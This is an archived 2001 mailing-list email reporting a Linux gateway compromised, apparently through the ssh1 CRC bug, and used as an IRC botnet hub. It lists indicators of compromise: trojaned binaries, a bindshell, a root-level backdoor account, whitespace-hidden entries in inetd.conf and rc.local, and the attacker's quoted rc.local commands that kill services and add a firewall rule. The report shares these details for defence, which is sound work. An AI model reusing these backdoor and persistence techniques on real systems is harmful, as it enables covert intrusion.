Return-Path: <sentto-279987-3857-1005592648-fc=all.net@returns.groups.yahoo.com> Delivered-To: fc@all.net Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Mon, 12 Nov 2001 11:19:08 -0800 (PST) Received: (qmail 27460 invoked by uid 510); 12 Nov 2001 19:16:24 -0000 Received: from n12.groups.yahoo.com (216.115.96.62) by all.net with SMTP; 12 Nov 2001 19:16:24 -0000 X-eGroups-Return: sentto-279987-3857-1005592648-fc=all.net@returns.groups.yahoo.com Received: from [10.1.1.221] by n12.groups.yahoo.com with NNFMP; 12 Nov 2001 19:17:28 -0000 X-Sender: fc@red.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-8_0_0_1); 12 Nov 2001 19:17:27 -0000 Received: (qmail 86515 invoked from network); 12 Nov 2001 19:17:27 -0000 Received: from unknown (216.115.97.167) by m3.grp.snv.yahoo.com with QMQP; 12 Nov 2001 19:17:27 -0000 Received: from unknown (HELO red.all.net) (65.0.156.78) by mta1.grp.snv.yahoo.com with SMTP; 12 Nov 2001 19:17:27 -0000 Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id fACJHxu21303 for iwar@onelist.com; Mon, 12 Nov 2001 11:17:59 -0800 Message-Id: <200111121917.fACJHxu21303@red.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL3] From: Fred Cohen <fc@all.net> X-Yahoo-Profile: fcallnet Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Mon, 12 Nov 2001 11:17:58 -0800 (PST) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit ... I am making this notification to assist in determining whether other folks have been affected by this attack. An associate's home NAT gateway linux box was hacked by what I am guessing was the ssh1 crc bug (ssh1 was the only exposed service). This machine looks to have been compromised on Nov 2nd at 1:15pm PST, I won't know for certain until I obtain his hard disk later today, and provided that /var logging is recoverable. This machine was running redhat 6.2, reasonably patched except for the fact that he was still running ssh1. It appears that someone may be building up a network of (potentially) DDOS hosts. I have done some quick research and found no matches for the signatures I have been able to identify so far. Using the Chkrootkit (www.chkrootkit.org) utilities did not identify a known trojan pack, so if this isn't identified in the wild, I'm already referring to it as the LIMPninja. It also appears that this particular host was used as a central host for other LIMPninja zombies. Also, haven't been able to determine what the command structure it is that the remote bots act upon. The following is by no means complete, even after a full examination of the drive has been completed, as there was never any file integrity base line completed(a shame). The attack appears to be scripted as all changes happened within a minute, except for the IRC server which was not installed until 2 days later (and manually). When I found this particular irc net there were over 120 hosts all communicating via IRC. This host was found to be running an unrealircd daemon from /usr/bin/bin/u/src/ircd listening at port 6669. All other compromised hosts were joining this irc network (ircd.hola.mx holad) on channel #kujikiri with a channel key of 'ninehandscutting'. All bots joined as the nick ninjaXXXX where XXXX is some RANDOM? selection of 4 upper case letters. Several ports were listening 3879 term (this port had an ipchains rule blocking all external traffic - placed by the attacker's script) 6669 ircd 9706 term 42121 inetd spawned in.telnetd Logs were wiped, and couldn't find a wiping utility so I'm thinking a simple rm or unlink was used, so I'm hoping to find more details when the disk is in hand. File modifications that were made follow:(not necessarily a complete analysis yet) clearly Trojaned binaries (probably others) /bin/ps /bin/netstat /bin/ls (this ls binary was hiding several things, directory structures named /u/, mysqld klogd ...) /usr/local/bin/sshd1 (the file was just several hundred bytes larger than previously) Binary file/directory additions /usr/bin/bin/u/ An entire directory structure containing the ircd server source /usr/bin/share/mysqld (looks like some type of irc spoofing proxy) /bin/klogd (almost looks like an ftp proxy) /bin/term (A bindshell of some sort) /usr/sbin/init.d was added and is exactly the same file size as term System configuration files that were modified/added /etc/hosts.allow made specific allowances for the .dk domain, as well as .cais.net .cais.com /etc/passwd two new accounts were added with the same password (des hashes -NOT MD5) /etc/shadow The added accounts were lpd 1212:1212, and admin 0:0 /etc/inetd.conf 200+ lines of whitespace added, and then the single telnet entry /etc/services was modified for telnet to start on port 42121 /etc/resolv.conf a new nameserver was added... /etc/psdevtab haven't examined closely yet /etc/rc.sysinit a line was added to start the /usr/sbin/init.d trojan/backdoor /etc/rc.local after much whitespace was added.... following lines at the bottom of the rc.local file killall -9 rpc.statd killall -9 gdm killall -9 gpm killall -9 lpd term klogd "/usr/bin/share/mysqld" /sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY Hope this helps other folks who will or have already encountered this attack. sorry for the ramble... It's been a long night - - -- William Salusky Manager: Security Services DMZ Services <a href="mailto:change@dmzs.com?Subject=Re:%20Fwd:%20Possible%20DDOS%20network%20being%20built%20through%20ssh1%20crc%20compromised%20hosts%2526In-Reply-To=%2526lt;E163Joz-0004Sp-00@johnnyjohnny.dmzs.com">change@dmzs.com</a> ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:59 PST